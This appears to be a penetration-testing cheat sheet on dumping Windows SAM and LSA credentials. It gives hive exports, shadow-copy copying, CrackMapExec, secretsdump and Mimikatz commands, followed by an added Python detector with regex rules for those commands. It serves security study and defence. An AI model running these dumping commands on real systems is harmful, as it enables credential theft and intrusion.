Local credentials (SAM and LSA)
Overview
SAM (Security Accounts Manager) and LSA (Local Security Authority) are two important databases used in the security architecture of Windows operating systems.
The SAM database is a part of the Windows registry and stores information related to local user accounts and security policies. It contains data such as usernames, passwords (hashed), account status, and group membership. Windows uses SAM to perform local user authentication and enforce security policies on a per-machine basis.
The LSA database, on the other hand, is a component of the Windows security subsystem that provides security-related services to applications and other system components. It stores security-related information such as authentication credentials, security policy settings, and account lockout policies. The LSA database is responsible for enforcing security policies, authenticating users, and managing security tokens for applications and system services.
In summary, while the SAM database is primarily concerned with managing local user accounts and security policies, the LSA database provides a broader range of security-related services and is used by various components of the Windows operating system.
SAM: Contains local cached credentials.
Security: Stores clear text credentials, password hashes, security tokens etc.
System: Stores enough info to decrypt the SAM and LSA hives.
Obtaining the SAM and LSA database
To be able to decrypt the SAM database, we'll require the sam and system hive where the encryption key is stored.
To be able to decrypt the LSA database, we'll require the security and system hive where the encryption key is stored.
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Creating a shadow copy.
wmic shadowcopy call create Volume='C:\'
List existing shadow copies.
vssadmin list shadows
Copying the SAM database.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
Copying the LSA databases.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\security C:\users\offsec.corp1\Downloads\security
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
Obtaining SAM
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --sam
Obtaining LSA
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --lsa
Full memory dump and Volatility
Obtain a memory dump with Magnet RAM Capture or another forensics tool.
Using Volatility to read memory and obtain credentials
py .\vol.py -f C:\Users\admin\ram_memdump.raw windows.hashdump.HashDump
Decoding the SAM and LSA database
Impacket's secretsdump is a Python tool used for extracting authentication credentials from Windows systems. It can extract password hashes from the Security Account Manager (SAM) database and Kerberos tickets from the Local Security Authority (LSA) database.
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Mimikatz is a powerful Windows post-exploitation tool that can extract sensitive information such as password hashes, plaintext passwords, and Kerberos tickets from memory on a compromised system.
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping of LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets on multiple hosts. It offers several authentication methods such as pass-the-hash (NTLM) or pass-the-ticket (Kerberos).
# Remote dumping of SAM/LSA secrets
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (local user authentication)
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-hash)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
crackmapexec smb $TARGETS --kerberos --sam/--lsa
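From the defender's side, the hive exports, shadow-copy access and local Mimikatz calls listed on this page all leave process command lines behind. The following added example (not from the original page or any of the tools it names) runs a small set of rules over constructed process-creation events in a hypothetical `ts|host|user|image|commandline` format and, because SYSTEM is needed to decrypt SAM or SECURITY, ranks hosts where that pair was exported highest. Remote dumps via CrackMapExec or secretsdump run on the operator's machine and need remote-registry or SMB telemetry instead.

```python
"""Flag the hive-export and credential-dump commands from the page in process-creation logs."""
import re
from typing import Dict, List, Set, Tuple

# Constructed sample events (not real telemetry): ts|host|user|image|commandline
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z|WS01|CORP\jdoe|C:\Windows\System32\reg.exe|reg save HKLM\sam C:\Temp\sam
2024-05-01T10:00:02Z|WS01|CORP\jdoe|C:\Windows\System32\reg.exe|reg save HKLM\system C:\Temp\system
2024-05-01T10:05:10Z|WS01|CORP\jdoe|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\security C:\Temp\security
2024-05-01T10:07:00Z|WS01|CORP\jdoe|C:\Windows\System32\notepad.exe|notepad C:\Temp\notes.txt
2024-05-01T10:09:00Z|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
"""

# (rule name, regex over the lower-cased command line). The shadow-copy rule on its own is
# low confidence: backup agents create and list shadow copies legitimately.
RULES: List[Tuple[str, re.Pattern]] = [
    ("hive_export_reg_save", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b")),
    ("shadow_copy_create_or_list", re.compile(
        r"\bwmic(?:\.exe)?\s+shadowcopy\s+call\s+create\b|\bvssadmin(?:\.exe)?\s+(?:create|list)\s+shadows?\b")),
    ("hive_copy_from_shadow", re.compile(
        r"harddiskvolumeshadowcopy\d+\\windows\\system32\\config\\(?:sam|security|system)\b")),
    ("mimikatz_lsadump", re.compile(r"lsadump::(?:sam|secrets)\b")),
]
# Which hive a reg save / shadow-copy copy touched.
HIVE_RX = re.compile(r"(?:hklm\\|config\\)(sam|security|system)\b")

def parse_event(line: str) -> Dict[str, str]:
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}

def detect(log_text: str) -> List[Dict]:
    """Return every event that matches at least one rule, tagged with the matching rule names."""
    findings = []
    for raw in log_text.strip().splitlines():
        ev = parse_event(raw)
        hits = [name for name, rx in RULES if rx.search(ev["cmdline"].lower())]
        if hits:
            findings.append({**ev, "rules": hits})
    return findings

def hosts_with_decryptable_set(findings: List[Dict]) -> Set[str]:
    """Hosts where SYSTEM plus SAM or SECURITY left the box: the pair needed to decrypt them."""
    hives: Dict[str, Set[str]] = {}
    for f in findings:
        if {"hive_export_reg_save", "hive_copy_from_shadow"} & set(f["rules"]):
            for hive in HIVE_RX.findall(f["cmdline"].lower()):
                hives.setdefault(f["host"], set()).add(hive)
    return {h for h, s in hives.items() if "system" in s and s & {"sam", "security"}}
```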